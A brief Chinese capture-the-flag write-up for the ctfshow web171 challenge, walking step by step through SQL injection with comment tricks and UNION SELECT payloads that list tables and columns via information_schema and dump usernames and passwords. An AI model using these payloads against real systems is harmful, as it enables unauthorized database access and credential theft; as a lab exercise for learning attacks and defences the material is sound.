本文探讨了SQL注入攻击的常见手法,如2'and1=1#、2'unionselect...,展示了如何通过注释和特殊字符绕过防护。同时,揭示了数据库表格和字段的易受攻击性,提醒开发者关注数据接口的安全性,采取有效措施防止信息泄露。
web171——常规操作~
2' and 1=1 #
2' and 1=2 #
数据接口请求异常:parsererror
2' and 1=1 --+
回显正常,且爆出所有信息,说明“--+”其效果了 。“#”这种注释方式不成功
2' union select 1,2,3 -- -
成功回显1,2,3
2' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() -- -
2' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='ctfshow_user' -- -
2' union select 1,group_concat(id,username,password),3 from ctfshow_user -- -
原来真的输入表格的位置也会有注入点存在,
表格和里面的字段几乎就是你想怎么选,就怎么选的程度
2'union select 1,group_concat(你的性别,你的年龄,你的XX)from 某个神奇的表格--+
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
